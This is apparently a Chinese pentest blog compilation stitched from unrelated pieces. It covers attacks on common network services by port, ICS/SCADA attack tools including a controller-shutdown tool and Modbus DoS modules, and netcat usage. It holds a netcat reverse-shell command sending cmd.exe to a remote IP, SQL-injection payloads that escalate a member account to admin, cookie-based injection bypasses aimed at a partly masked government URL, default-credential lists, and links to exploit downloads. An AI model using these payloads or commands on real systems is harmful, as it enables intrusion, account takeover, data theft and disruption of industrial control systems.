端口渗透总结
0x00 背景
在前段时间的渗透中，我发现通过端口来进行渗透有时会提升我们的效率，所以才有了这篇文章的诞生；

首先分享一份关于端口及他们对应的服务文件：https://yunpan.cn/cYyNXEpZNYvxQ  访问密码 983e

这里再分享一篇我曾经在百度文库提交的端口渗透文章：请点我

再次看这篇文章发现写的很简单，也只描述了几个常见的端口渗透；而且一般我们都是可以修 改默认端口的，所以平时在渗透过程中，对端口信息的收集就是一个很重要的过程；然后对症下药就可以更快的渗透进入我们需要的服务器；接下来就详细通过渗透 实战对端口的渗透进行更加深入的剖析；

端口渗透过程中我们需要关注几个问题：

1、  端口的banner信息

2、  端口上运行的服务

3、  常见应用的默认端口

当然对于上面这些信息的获取，我们有各式各样的方法，最为常见的应该就是nmap了吧！我们也可以结合其他的端口扫描工具，比如专门的3389、1433等等的端口扫描工具；

服务默认端口
公认端口(Well Known Ports)：0-1023，他们紧密绑定了一些服务；

注册端口(Registered Ports)：1024-49151，他们松散的绑定了一些服务；

动态/私有：49152-65535，不为服务分配这些端口；

当然这些端口都可以通过修改来达到欺骗攻击者的目的，但是这就安全了吗？攻击者又可以使用什么攻击方式来攻击这些端口呢？

还需要注明的一点是：很多木马工具也有特定的端口，本文并没有涉及到这块的内容，大家可以自己去收集收集！

关于爆破之我见
在对这些端口进行实战讲解时，我需要先阐述一下我对爆破这个方式的一些看法；

爆破：技术最简单，需要的技术能力基本为0，工作效率与网络、硬件等相关，在我看来爆破其实是最强大的攻击方式，特别是结合一些特制的字典，结合社工我们可以在很短的时间达到最大的效果，只不过因为我们的pc或者字典不够强大，所以很多时候我们不能进行一次优秀的爆破攻击；当然现在很多web应用以及服务端口都限制了暴力破解；对于这种做了限制的我们可能就需要利用到本文提到的其他攻击了！

分享一个团队sai总结的字典：请点击

声明：本文总结的都是近两年的常见漏洞，以前的老版漏洞以及危害性不大的漏洞没有总结，望大家谅解！

0x01 实战测试
文件共享服务端口渗透
ftp服务
FTP服务：ftp服务我分为两种情况，第一种是使用系统软件来配置，比如IIS中的FTP文件共享或Linux中的默认服务软件；第二种是通过第三方软件来配置，比如Serv-U还有一些网上写的简易ftp服务器等；

默认端口：20（数据端口）；21（控制端口）；69（tftp小型文件传输协议）

攻击方式：

爆破：ftp的爆破工具有很多，这里我推荐owasp的Bruter 以及msf中ftp爆破模块；

匿名访问：用户名：anonymous  密码：为空或任意邮箱

用户名：FTP            密码：FTP或为空

用户名：USET         密码：pass

当然还有不需要用户名密码直接访问的，一般出现在局域网中；

0

嗅探：ftp使用明文传输技术（但是嗅探给予局域网并需要欺骗或监听网关）

01

后门技术：在linux的vsftp某一版本中，存在着一个后门程序，只要在用户名后面加上 就会在6200上打开一个监听Shell，我们可以使用telnet直接连接；详细请点击

远程溢出漏洞：6.10.1 IIS FTP远程溢出漏洞，在IIS FTP服务器中NLST命令存在一个缓冲区溢出漏洞，这个漏洞可能是攻击者在服务器运行一条非法命令。

跳转攻击：（Bounce Attacks）攻击者发送一个FTP”PORT”命令给目标FTP服务器，其中包含该主机的网络地址和被攻击的服务的端口号。这样，客户端就能命令FTP服务器发一个文件给被攻击的服务。这个文件可能包括根被攻击的服务有关的命令（如SMTP,NNTP等）。由于是命令第三方去连接到一种服务，而不是直接连接，就使得跟踪攻击者变得困难，并且还避开了基于网络地址的访问限制。（注：此种情况小白并没有遇到过，只是总结一下，欢迎大牛指教）

案例分享：

山东电信Serv-U Web客户端弱口令

长虹ftp弱口令导致全网数据泄漏

NFS服务
nfs：网络文件系统，允许网络中的计算机通过TCP/IP网络共享资源。基于Linux系统，配置方面很简单，详细配置请参考案例分享。在nfs配置中，有不做任何限制的，有限制用户，有限制IP，以及在版本2.x中我们还可以使用证书来验证用户。当然不同的限制可以采用的攻击方式也不一样；就目前而言网上关于nfs的攻击还是比较少的!

默认端口：2049

攻击方式：

未授权访问：未限制IP以及用户权限设置错误

案例分享：

Nfs配置不当导致被入侵

NFS服务全攻略

Samba服务
Samba服务：对于这个可以在windows与Linux之间进行共享文件的服务同样是我们攻击的关注点；samba登录分为两种方式，一种是需要用户名口令；另一种是不需要用户名口令。在很多时候不光是pc机，还有一些服务器，网络设备都开放着此服务，方便进行文件共享，但是同时也给攻击者提供了便利。

默认端口：137（主要用户NetBIOS Name Service；NetBIOS名称服务）、139（NetBIOS Session Service，主要提供samba服务）

攻击方式：

爆破：弱口令（爆破工具采用hydra）hydra -l username -P
PassFile IP smb

未授权访问：给予public用户高权限

远程代码执行漏洞：CVE-2015-0240等等

案例分享：

Samba远程代码执行漏洞

未授权访问文件系统漏洞

LDAP协议
ldap：轻量级目录访问协议，最近几年随着ldap的广泛使用被发现的漏洞也越来越多。但是毕竟主流的攻击方式仍旧是那些，比如注入，未授权等等；这些问题的出现也都是因为配置不当而造成的。

默认端口：389

攻击方式：

注入攻击：盲注

未授权访问：

爆破：弱口令

案例分享：

LDAP注入与防御剖析

欧朋LDAP服务匿名访问

使用LDAP查询快速提升域权限

远程连接服务端口渗透
SSH服务
SSH服务：这个服务基本会出现在我们的Linux服务器，网络设备，安全设备等设备上，而且很多时候这个服务的配置都是默认的；对于SSH服务我们可能使用爆破攻击方式较多。

默认端口：22

攻击方式

爆破：弱口令、

漏洞：28退格漏洞、OpenSSL漏洞

案例分享：

安宇创新科技ssh弱口令

宜信贷某站存在OpenSSL漏洞

Telnet服务
Telnet服务：在SSH服务崛起的今天我们已经很难见到使用telnet的服务器，但是在很多设备上同样还是有这个服务的；比如cisco、华三，深信服等厂商的设备；我就有很多次通过telnet弱口令控制这些设备；

默认端口：23

攻击方式

爆破：弱口令

嗅探：此种情况一般发生在局域网；

案例分享：

大量惠普打印机远程telnet可被查看和操作

Windows远程连接
远程桌面连接：作为windows上进行远程连接的端口，很多时候我们在得到系统为windows的shell的时候我们总是希望可以登录3389实际操作对方电脑；这个时候我们一般的情况分为两种。一种是内网，需要先将目标机3389端口反弹到外网；另一种就是外网，我们可以直接访问；当然这两种情况我们利用起来可能需要很苛刻的条件，比如找到登录密码等等；

默认端口：3389

攻击方式：

爆破：3389端口爆破工具就有点多了

Shift粘滞键后门：5次shift后门

3389漏洞攻击：利用ms12-020攻击3389端口，导致服务器关机；请参考

VNC服务
VNC：一款优秀的远控工具，常用语类UNIX系统上，简单功能强大；也

默认端口：5900+桌面ID（5901；5902）

攻击方式：

爆破：弱口令

认证口令绕过：

拒绝服务攻击：（CVE-2015-5239）

权限提升：（CVE-2013-6886）

案例分享：

广西电信客服服务器使用VNC存在弱口令可直接控制

Pcanywhere服务
PyAnywhere服务：一款远控工具，有点类似vnc的功能；这个服务在以前很多黑客发的视频里面都有，利用pcanywhere来进行提权；

默认端口：5632

攻击方式：

提权控制服务：

拒绝服务攻击：

代码执行：请参考

案例分享：

黑龙江物价局多处安全漏洞可能导致服务器沦陷(pcAnywhere提权+密码突破)

Web应用服务端口渗透
HTTP服务：对于http服务其实是我们目前这几年比较常见的攻击入口，所以这里会针对http服务进行一个详细的详解；

注：这个板块的所有攻击方式，如果涉及到常规的web漏洞不会提出来，除非是特定的服务器才会产生的漏洞；

IIS服务
默认端口：80/81/443

攻击方式：

IIS
PUT写文件：利用IIS漏洞，put方法直接将文件放置到服务器上

短文件名泄漏：这种一般没啥影响

解析漏洞：详细见apache服务

案例分享：

徐州市教育系统大量IIS PUT漏洞

用友软件IIS写权限(PUT)导致可获取webshell控制服务器

国家电网某分站存在iis短文件名漏洞

Apache/Tomcat/Nginx/Axis2
默认端口：80/8080

攻击方式：

爆破：弱口令（爆破manager后台）

HTTP慢速攻击：可以把服务器打死，对一些大型的网站有影响；

解析漏洞：请参考

案例分享：

安卓开发平台存在上传漏洞和Apache解析漏洞,成功获取webshell

腾讯分站 Apache 漏洞

WebLogic
默认端口：7001

攻击方式：

爆破：弱口令 4组：用户名密码均一致：system weblogic（密码可能weblogic123） portaladmin guest

Congsole后台部署webshell：

Java反序列化：

泄漏源代码/列目录：这个太老了，估计网上都没有了吧！

SSRF窥探内网：央视网SSRF可窥探内网

案列分享：

福建省人力资源和社会保障厅下属某WEBLOGIC弱口令

利用Weblogic进行入侵的一些总结

Jboss
默认端口8080；其他端口1098/1099/4444/4445/8080/8009/8083/8093

攻击方式：

爆破：弱口令（爆破jboss系统后台）

远程代码执行：由于配置不当造成

Java反序列化：

案例分享

中华人民共和国民政部JBoss配置不当

JBOSS安全问题总结

中国科学院某处jboss应用漏洞

Websphere
默认端口：908*；第一个应用就是9080，第二个就是9081；控制台9090

攻击方式：

爆破：弱口令（控制台）

任意文件泄漏：（CVE-2014-0823）

Java反序列化

案例分享：

中国电信某通用型业务系统(Websphere)GetShell漏洞

大汉网络有限公司远程命令执行漏洞(WebSphere案例)

GlassFish
默认端口：http 8080；IIOP 3700；控制台4848

攻击方式：

爆破：弱口令（对于控制台）

任意文件读取：

认证绕过：

案例分享：

应用服务器glassfish存在通用任意文件读取漏洞

Oracle GlassFish Server认证绕过

Jenkins
默认端口：8080、8089

攻击方式：

爆破：弱口令（默认管理员）

未授权访问：

反序列化：

案例分享：

酷6Jenkins系统未授权访问可执行系统命令

Resin
默认端口：8080

攻击方式：

目录遍历

远程文件读取

案例分享：

爱奇艺Resin配置漏洞

Resin漏洞利用案例之目录遍历/以金蝶某系统为例

Jetty
默认端口：8080

攻击方式：

远程共享缓冲区溢出

Lotus
影响的都是一些大型的企业，特别需要注意，经过以前的测试发现弱口令这个问题经常都存在，可能是很多管理员不知道如何去修改（不要打我）。

默认端口：1352

攻击方式：

爆破：弱口令（admin password）控制台

信息泄露

跨站脚本攻击

案例分享：

Lotus Domino WebMail一处越权访问

中电投集团某系统弱口令直达内网涉及/OA系统/内部邮箱/财务系统/人力资源系统

中国某大型金融机构地方业务弱口令导致数万商户信息泄露&访问Lotus Domino后台

数据库服务端口渗透
针对所有的数据库攻击方式都存在SQL注入，这里先提出来在下面就不一一写了免得大家说我占篇幅；当然不同的数据库注入技巧可能不一样，特别是NoSQL与传统的SQL数据库不太一样。但是这不是本文需要介绍的重点，后面有时间会写一篇不同数据库的渗透技巧。

MySQL数据库
默认端口：3306

攻击方式：

爆破：弱口令

身份认证漏洞：CVE-2012-2122

拒绝服务攻击：利用sql语句是服务器进行死循环打死服务器

Phpmyadmin万能密码绕过：用户名：‘localhost’@’@”  密码任意

案例分享：

漏洞分享

和讯网某站点存在mysql注入漏洞

MySQL提权总结

MSSQL数据库
默认端口：1433（Server 数据库服务）、1434（Monitor 数据库监控）

攻击方式：

爆破：弱口令/使用系统用户

案例分享：

MSSQL注射总结

上海安脉综合管理系统mssql注射漏洞

解密MSSQL连接数据库密码

从攻击MSSQL到提权: 使用msf针对mssql的一次完整渗透

Oracle数据库
默认端口：1521（数据库端口）、1158（Oracle EMCTL端口）、8080（Oracle XDB数据库）、210（Oracle XDB FTP服务）

攻击方式：

爆破：弱口令

注入攻击；

漏洞攻击；

案例分享：

Oracle盲注结合XXE漏洞远程获取数据

PostgreSQL数据库
PostgreSQL是一种特性非常齐全的自由软件的对象–关系型数据库管理系统，可以说是目前世界上最先进，功能最强大的自由数据库管理系统。包括我们kali系统中msf也使用这个数据库；浅谈postgresql数据库攻击技术  大部分关于它的攻击依旧是sql注入，所以注入才是数据库不变的话题。

默认端口：5432

攻击方式：

爆破：弱口令：postgres postgres

缓冲区溢出：CVE-2014-2669

案例分享：

Hacking postgresql

关于postgresql的那些事

MongoDB数据库
MongoDB：NoSQL数据库；攻击方法与其他数据库类似；关于它的安全讲解：请参考

默认端口：27017

攻击方式：

爆破：弱口令

未授权访问；github有攻击代码；请点击

案例分享：

MongoDB phpMoAdmin远程代码执行

搜狐MongoDB未授权访问

新浪微米未授权访问

解决MongoDB各种隐患问题

Redis数据库
redis：是一个开源的使用c语言写的，支持网络、可基于内存亦可持久化的日志型、key-value数据库。关于这个数据库这两年还是很火的，暴露出来的问题也很多。特别是前段时间暴露的未授权访问。Exp：https://yunpan.cn/cYjzHxawFpyVt  访问密码 e547

默认端口：6379

攻击方式：

爆破：弱口令

未授权访问+配合ssh key提权；

案例分享：

中国铁建网redis+ssh-keygen免认证登录

SysBase数据库
默认端口：服务端口5000；监听端口4100；备份端口：4200

攻击方式：

爆破：弱口令

命令注入：

案例分享：

广西自考信息系统Sybase数据库注入

Sybase EAServer命令注入漏洞

DB2数据库
默认端口：5000

攻击方式：

安全限制绕过：成功后可执行未授权操作（CVE-2015-1922）

案例分享：

哈尔滨银行主站DB2注入

总结一下：对于数据库，我们得知端口很多时候可以帮助我们去渗透，比如得知mysql的 数据库，我们就可以使用SQL注入进行mof、udf等方式提权；如果是mssql我们就可以使用xp_cmdshell来进行提权；如果是其它的数据 库，我们也可以采用对应的方式；比如各大数据库对应它们的默认口令，版本对应的漏洞！

顺便提一下：很多时候银行企业采用的都是oracle、db2等大型数据库；

邮件服务端口渗透
SMTP协议
smtp：邮件协议，在linux中默认开启这个服务，可以向对方发送钓鱼邮件！

默认端口：25（smtp）、465（smtps）

攻击方式：

爆破：弱口令

未授权访问

案例分享：

腾讯邮箱smtp注册时间限制绕过漏洞

邮件伪造详解

qq邮箱伪造发件地址，容易被钓鱼利用

众多厂商邮件系统配置不当可伪造邮件人

POP3协议
默认端口：109（POP2）、110（POP3）、995（POP3S）

攻击方式：

爆破；弱口令

未授权访问；

案例分享：

中国联通沃邮箱等部分Android客户端免密码登陆（可获取任意联通用户pop3密码）

中航信邮箱密码泄漏及VPN账号和大量邮箱弱口令导致可内网漫游拿到域控

IMAP协议
默认端口：143（imap）、993（imaps）

攻击方式：

爆破：弱口令

配置不当

案例分享：

163邮箱二次验证饶过缺陷

南方周末邮件服务器任意文件读取漏洞

网络常见协议端口渗透
DNS服务
默认端口：53

攻击方式：

区域传输漏洞

见2中的总结

案例分享：

全球Top1000Websites中存在DNS区域传送漏洞的网站列表

团购王某站DNS域传送漏洞

DNS泛解析与内容投毒

DHCP服务
默认端口：67&68、546（DHCP Failover做双机热备的）

攻击方式：

DHCP劫持；

见2中总结

案例分享：

流氓DHCP服务器内网攻击测试

SNMP协议
默认端口：161

攻击方式:

爆破：弱口令

案例分享：

snmp弱口令引起的信息泄漏

基于snmp的反射攻击的理论及其实现

华为某服务器SNMP弱口令

其他端口渗透
Hadoop文件服务
默认端口：请参考

案例分享：

Apache Hadoop远程命令执行

新浪漏洞系列第六弹–大量hadoop应用对外访问

Zookeeper服务
zookeeper：分布式的，开放源码的分布式应用程序协调服务；提供功能包括：配置维护、域名服务、分布式同步、组服务等。详情请参考百度百科

默认端口：2181

攻击方式：

未授权访问；

案例分享：

zookeeper未授权访问漏洞

网上关于这方面的案例暂时不多，但是对于大数据逐渐泛滥的今天，这些漏洞未来会在乌云上出现一大波！

Zabbix服务
zabbix：基于Web界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。监视各种网络参数，保证服务器系统的安全运营。

默认端口：8069

攻击方式：

远程命令执行：

案例分享：

当渗透遇到zabbix–小谈zabbix安全

Zabbix的前台SQL注射漏洞利用

网易zabbix运维不当，导致任意命令执行。(可提权、可内网渗透)

elasticsearch服务
elasticsearch：请百度（因为我觉得我解释不清楚）

默认端口：9200（）、9300（）

攻击方式：

未授权访问；

远程命令执行；

文件遍历；

低版本webshell植入；

案例分享：

ElasticSearch 远程代码执行漏洞

elasticsearch 漏洞利用工具

memcache服务
默认端口：11211

案例分享：

Memcache安全配置

memcache 未授权访问漏洞

Linux R服务
R服务：TCP端口512,513和514为著名的rlogin提供服务。在系统中被错误配置从而允许远程访问者从任何地方访问（标准的，rhosts + +）。

默认端口：512（remote process execution）；513（remote login a la
telnet）；514（cmd）

攻击方式：

使用rlogin直接登录对方系统；

RMI
RMI：我们使用这两个端口很少的原因是因为必须是java，而且rmi穿越防火墙并不好穿越；这里我不会去涉及其他的东西，这里提出RMI只是因为在前段时间的java反序列化中，我们的小伙伴Bird写过一个weblogic利用工具，里面涉及到了RMI的一些东西，在有的时候使用socket不能成功时，我们可以使用RMI方式来进行利用；

默认端口：1090（）、1099（）

攻击方式：

远程命令执行（java反序列化，调用rmi方式执行命令）

这就是RMI的魅力了！

工具下载：请点我

Rsync服务
Rsync：类UNIX系统下的数据备份工具（remote sync），属于增量备份；关于它的功能，大家自行百度百科吧，其实上面很多大家也看到了说是端口渗透，其实就是端口对应服务的渗透，服务一般出错就在配置或者版本问题上，rsync也不例外。Rsync默认允许匿名访问，如果在配置文件中没有相关的用户认证以及文件授权，就会触发隐患。

默认端口：873

攻击方式：

未授权访问；

本地提权：rsync默认以root运行，利用rsync上传一个文件，只要这个文件具有s权限，我们执行我们的攻击脚本就可以具有root权限。详细请参考 和 参考二

案例分享：

搜狐几处rsync未授权访问

Socket代理
默认端口：1080

Socket代理针对代理来说没有什么漏洞，一般只是在渗透过程中作为我们的代理，进入内网，或者渗透域和林的时候有帮助。这里不做过多描述，但是可以尝试爆破一下代理的用户名和密码，万一运气好能登录，不也~~~~

案例分享：

利用php socket5代理渗透内网

0x02 总结两句
图解端口渗透
端口号

工业控制系统(ICS)通常被安全行业用来测试网络和应用中的漏洞。在这里，您可以找到综合工业控制系统(ICS)工具列表，其中包括在所有企业环境中执行渗透测试操作。

工业管理系统（ICS / SCADA）现在是网络攻击者的主要目标，这些攻击者试图破坏生产基地和公共设施

工业控制系统（ICS）工具

发行套件

蜜罐

数据

订阅和新闻

会议和会议资料

相关文献

介绍ICS、SCADA和PLC

 下面是部分软件用法及运行截图：

1、CSET 8.1

官方在Youtube提供了一些使用视频，视频地址

2、Digital Bond’s ICS Enumeration Tools 

该脚本是基于Nmap下的脚本，下载后，您需要将其移至NSE Scripts目录中

BACnet-discover-enumerate.nse - 识别和枚举BACnet设备

codesys-v2-discover.nse - 识别并列举CoDeSys V2控制器

enip-enumerate.nse - 识别并列举来自罗克韦尔自动化和其他供应商的EtherNet / IP设备

fox-info.nse - 识别并列举Niagara Fox设备

modicon-info.nse - 识别并列举Schneider Electric Modicon PLC

omron-info.nse - 识别并列举欧姆龙PLC

pcworx-info.nse - 识别并枚举支持PC Worx协议的PLC

proconos-info.nse - 识别并列举支持ProConOS的PLC

s7-enumerate.nse - 识别并列举西门子SIMATIC S7 PLC等。。

详细的使用安装请点击

3、mbtget

Modbus是一种标准的串行通信协议，用于连接工业PLC（以及其他许多事物）。通过该模块，您可以通过MBclient对象访问此协议的TCP和RTU版本。可以看看http://en.wikipedia.org/wiki/Modbus了解详情。

安装：

git clone https://github.com/sourceperl/mbtget.gitcd mbtget
perl Makefile.PL
make
sudo make install

用法：

读取modbus服务器127.0.0.1上的地址1000处的字数据

root@kali:~# mbtget -a 1000 127.0.0.1values:1 (ad 01000): 52544

在modbus服务器plc-1.domaine.net的地址1000处读取10个字的数据

root@kali:~# mbtget -n 10 -a 1000 plc-1.domaine.netvalues:1 (ad 01000): 525442 (ad 01001): 336193 (ad 01002): 610104 (ad 01003): 118785 (ad 01004): 601426 (ad 01005): 217147 (ad 01006): 141828 (ad 01007): 643429 (ad 01008): 1851110 (ad 01009): 59909

在modbus服务器127.0.0.1上的地址1000处写入一个字值333，并启用转储模式

root@kali:~# mbtget -w6 333 -a 1000 -d 127.0.0.1Tx
[10 01 00 00 00 06 01] 06 03 E8 01 4D
Rx
[10 01 00 00 00 06 01] 06 03 E8 01 4D

word write ok

4、MODBUS Penetration Testing Framework 

MODBUS渗透测试框架，smod是一个模块化框架，可以用来测试modbus协议所需的各种诊断和攻击功能。这是一个使用Python和Scapy的完整的Modbus协议实现。这个软件可以在python 2.7.x下的Linux / OSX上运行。

近年来，Summery SCADA（过程控制网络）系统已经从专有封闭网络转向开源解决方案和支持TCP / IP的网络。这使他们容易受到我们传统计算机网络面临的相同安全漏洞的影响。Modbus / TCP协议被用作参考协议来显示测试台在对电力系统协议执行网络攻击时的有效性。

#一个展示基础知识的小演示

root@kali:~/smod# python smod.py 
 _______ 
< SMOD >
 ------- 
        \   ^__^
         \  (xx)\_______
            (__)\       )\/\
             U  ||----w |
                ||     ||
          --=[MODBUS Penetration Test FrameWork
       --+--=[Version : 1.0.4
       --+--=[Modules : 23
       --+--=[Coder   : Farzin Enddo
          --=[github  : www.github.com/enddo

SMOD >help
 Command  Description                                      
 -------  -----------                                      
 back     Move back from the current context               
 exit     Exit the console                                 
 exploit  Run module                                       
 help     Help menu                                        
 show     Displays modules of a given type, or all modules 
 set      Sets a variable to a value                       
 use      Selects a module by name                         
SMOD >show modules
 Modules                                       Description                                       
 -------                                       -----------                                       
 modbus/dos/arp                                DOS with Arp Poisoning                            
 modbus/dos/galilRIO                           DOS Galil RIO-47100
 modbus/dos/writeAllCoils                      DOS With Write All Coils                          
 modbus/dos/writeAllRegister                   DOS With Write All Register Function 
 modbus/dos/writeSingleCoils                   DOS With Write Single Coil Function               
 modbus/dos/writeSingleRegister                DOS Write Single Register Function                
 modbus/function/fuzzing                       Fuzzing Modbus Functions                          
 modbus/function/readCoils                     Fuzzing Read Coils Function                       
 modbus/function/readCoilsException            Fuzzing Read Coils Exception Function             
 modbus/function/readDiscreteInput             Fuzzing Read Discrete Inputs Function             
 modbus/function/readDiscreteInputException    Fuzzing Read Discrete Inputs Exception Function   
 modbus/function/readExceptionStatus           Fuzzing Read Exception Status Function            
 modbus/function/readHoldingRegister           Fuzzing Read Holding Registers Function           
 modbus/function/readHoldingRegisterException  Fuzzing Read Holding Registers Exception Function 
 modbus/function/readInputRegister             Fuzzing Read Input Registers Function             
 modbus/function/readInputRegisterException    Fuzzing Read Input Registers Exception Function   
 modbus/function/writeSingleCoils              Fuzzing Write Single Coil Function                
 modbus/function/writeSingleRegister           Fuzzing Write Single Register Function            
 modbus/scanner/arpWatcher                     ARP Watcher                                       
 modbus/scanner/discover                       Check Modbus Protocols                            
 modbus/scanner/getfunc                        Enumeration Function on Modbus                    
 modbus/scanner/uid                            Brute Force UID                                   
 modbus/sniff/arp                              Arp Poisoning   
SMOD >

蛮力Modbus UID

SMOD >use modbus/scanner/uid
SMOD modbus(uid) >show options
 Name      Current Setting  Required  Description                                 
 ----      ---------------  --------  -----------                                 
 Function  1                False     Function code, Defualt:Read Coils.          
 Output    True             False     The stdout save in output directory         
 RHOSTS                     True      The target address range or CIDR identifier 
 RPORT     502              False     The port number for modbus protocol         
 Threads   1                False     The number of concurrent threads            
SMOD modbus(uid) >set RHOSTS 192.168.1.6SMOD modbus(uid) >exploit 
[+] Module Brute Force UID Start
[+] Start Brute Force UID on : 192.168.1.6[+] UID on 192.168.1.6 is : 10SMOD modbus(uid) >

在Modbus上的枚举功能

SMOD >use modbus/scanner/getfunc
SMOD modbus(getfunc) >show options
 Name     Current Setting  Required  Description                                 
 ----     ---------------  --------  -----------                                 
 Output   True             False     The stdout save in output directory         
 RHOSTS                    True      The target address range or CIDR identifier 
 RPORT    502              False     The port number for modbus protocol         
 Threads  1                False     The number of concurrent threads            
 UID      None             True      Modbus Slave UID.                           
SMOD modbus(getfunc) >set RHOSTS 192.168.1.6SMOD modbus(getfunc) >set UID 10SMOD modbus(getfunc) >exploit 
[+] Module Get Function Start
[+] Looking for supported function codes on 192.168.1.6[+] Function Code 1(Read Coils) is supported.
[+] Function Code 2(Read Discrete Inputs) is supported.
[+] Function Code 3(Read Multiple Holding Registers) is supported.
[+] Function Code 4(Read Input Registers) is supported.
[+] Function Code 5(Write Single Coil) is supported.
[+] Function Code 6(Write Single Holding Register) is supported.
[+] Function Code 7(Read Exception Status) is supported.
[+] Function Code 8(Diagnostic) is supported.
[+] Function Code 15(Write Multiple Coils) is supported.
[+] Function Code 16(Write Multiple Holding Registers) is supported.
[+] Function Code 17(Report Slave ID) is supported.
[+] Function Code 20(Read File Record) is supported.
[+] Function Code 21(Write File Record) is supported.
[+] Function Code 22(Mask Write Register) is supported.
[+] Function Code 23(Read/Write Multiple Registers) is supported.
SMOD modbus(getfunc) >

模糊读取线圈功能

SMOD >use modbus/function/readCoils
SMOD modbus(readCoils) >show options
 Name       Current Setting  Required  Description                                 
 ----       ---------------  --------  -----------                                 
 Output     True             False     The stdout save in output directory         
 Quantity   0x0001           True      Registers Values.                           
 RHOSTS                      True      The target address range or CIDR identifier 
 RPORT      502              False     The port number for modbus protocol         
 StartAddr  0x0000           True      Start Address.                              
 Threads    1                False     The number of concurrent threads            
 UID        None             True      Modbus Slave UID.                           
SMOD modbus(readCoils) >set RHOSTS 192.168.1.6SMOD modbus(readCoils) >set UID 10SMOD modbus(readCoils) >exploit 
[+] Module Read Coils Function Start
[+] Connecting to 192.168.1.6[+] Response is :###[ ModbusADU ]###
  transId   = 0x2
  protoId   = 0x0
  len       = 0x4
  unitId    = 0xa###[ Read Coils Answer ]###
     funcCode  = 0x1
     byteCount = 1L
     coilStatus= [0]
SMOD modbus(readCoils) >

5、SCADAShutdownTool

SCADAShutdownTool是一个工业控制系统自动化和测试工具，允许安全研究人员和专家测试SCADA安全系统，枚举从属控制器，读取控制器的寄存器值并重写寄存器数据。SCADAShutdownTool允许枚举控制器的所有寄存器类型，包括线圈输出，数字输入，模拟输入，保持寄存器和扩展寄存器。

SCADAShutdownTool可以以不同的模式运行，包括：

安全模式：只读并列出非零值。

实模式：仅重写非零值。

积极模式：重写所有控制器寄存器。

控制器寄存器可以用用户指定的默认值或“关闭值”重新写入。

SCADAShutdownTool仅为研究目的而开发，强烈建议您不要将此工具用于非法目的。

下载：

SCADAShutdownTool v1.0 Beta

https://0xicf.wordpress.com/tools/scada-shutdown-tool

https://github.com/0xICF/SCADAShutdownTool

使用：

./SCADAShutdownTool.py

警告：

SCADAShutdownTool允许恶意攻击者在SCADA网络，工业控制系统和控制器上扫描，模糊和执行远程命令。对于使用此工具造成的任何损害，本站概不负责。

运行截图：

6、splonebox

splonebox是一个开源网络评估工具，专注于工业控制系统。它提供了对您的网络及其设备的持续分析。模块化设计允许编写额外的插件。

监控和数据采集（SCADA）是总结工业控制系统（ICS）设备的流行词。这些设备专门用于控制工业流程，如生产线甚至钻孔工厂。通常情况下，ICS由可编程逻辑控制器（PLC），执行器和传感器组成。通常情况下，工业网络还包括附加设备，如人机界面（HMI）或网关。

运行界面：

篇幅有限，还有很多没有展示，等待大家自己去探索。

原文链接:https://www.freebuf.com/sectool/174567.html

监听999端口

-l -p 999

-e 重定向程序 cmd.exe

-L 直到结束。

-d 隐藏后台模式

端口转发：

nc.exe -lvvp 999  #hacker 
nc.exe -e cmd.exe IP 999 #loser

nc lp 999 <hack.txt -q 1  #将hack.txt放进管道以便传输
nc -nv IP >hackin.txt    #接受传输来的hack.txt文件

nc打包目录     

发送端   tar -cvf - dir/ | nc -lp 9995 -q 1  #横线不能少！  cvf压缩包
接收端  nc 192.168.8.142 9995 | tar xvf -                       #xvf解包

附录：

打包并压缩：

tar -zcvf xxx.tar.gz /test/*
tar -zcvf xxx.tar.gz aaa.txt bbb.txt ccc.txt

【 抓包nc上传获取管理权限 】
这个方法相当于cookie欺骗，首先到前台去注册一个会员，注册成功后在登录的那一刻，用抓包工具进行抓包，把抓到的数据复制到1.txt里面。
接下来打开，把双引号里棉的数据“X-Forwarded-For: 127.0.0.2′,group_id = 1 where loginname = ‘会员的帐号’#” 放在Content-Length：的下面。
在看到最底下的loginname=这行代码，把最后面的验证码改成当前会员登陆的验证码，然后将nc\1.txt 放在同一个目录下，cmd命令：nc 域名 80<1.txt
成功提交上去后，刚才的会员帐户将变成管理员帐户了，找到该站的后台地址登录即可实现cookie欺骗！
=============================================================================================================================================================
【 cookie欺骗 】
当我们通过注入或是社工把管理员的帐号跟md5密码搞到手的时候，却发现破解不出密码 (MD5是16位加密的)
那么我们就可以用COOKIE欺骗来绕过，利用桂林老兵的cookie欺骗工具，把自己的ID以及md5密码都修改成管理员的，再修改cookie，访问时就会实现欺骗了。
=============================================================================================================================================================
【 cookie中转突破防注入 】
有时检测一个网站，系统会弹出一些SQL防注入的提示框，这时我们可以利用COOKIE中转注入来进行突破，首先准备一个webshell，然后打开COOKIE中转工具。
复制注入点到“注入URL地址跟来源页”处，把问号去掉，再把问号后面的ID=剪切到“注入键名”里，再把ID=后面那个参数剪切到“POST提交值”里替换jmdcw=后面的参数。
点击生成，再把生成的文件上传到webshell里，然后访问路径，再页面地址后面加“?jmdcw=参数”，这样搭建构造出来的注入点就绕过防注入了！
以上是在webshell里搭建ASP坏境的方法，下面的是本地架设ASP环境的方法：
利用简易IIS服务器搭建一个环境，再将COOKIE中转生成的文件放到简易IIS服务器的目录下！然后运行简易IIS服务器，在后面+文件名+问号+jmdcw=参数即可。
=============================================================================================================================================================
【 cookie手工突破防注入 】
第一种方法：
用 and 1=1 and 1=2 检测网站是否存在注入点时，如果提示你的IP已被记录，就说明系统做了防注入措施，可以用代码来突破。
管理员只过滤了and，但是没有过滤or，我们可以先猜网站的字段数 格式：order by 数字  猜到错为止，然后选前一个对的数字！
比如猜到14错误，那就是13了，然后利用Cookie提交变量值，代码：javascript:alert(document.cookie=id=”+escape(“这里填写变量值，例如：id=408″));
开始猜解表段，代码：javascript:alert(document.cookie=”id=”+escape(“变量值 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from admin”));
复制在浏览器里打开，将出现一个提示框，点击确定就会注射进去，再重新打开网站（要在此处打开，所以前面最好复制下网站地址）
然后就会出现两个提示数字，比如5跟6，然后在代码的5跟6处猜帐号密码，常见的帐号有：user  username  密码:pass  password
复制修改后的代码放到浏览器里打开，就会爆破出网站的帐号密码了。

第二种方法：
注入点：http://www.XXXXXXXX.gov.cn/shownews.asp?id=4098
首先把?id=408去掉，然后访问如果提示“数据库出错”！就说明网站没有过滤Cookie提交方式，可以利用Cookie欺骗绕过防注入！
利用Cookie提交变量值，代码：javascript:alert(document.cookie=”id=”+escape(“4098″)
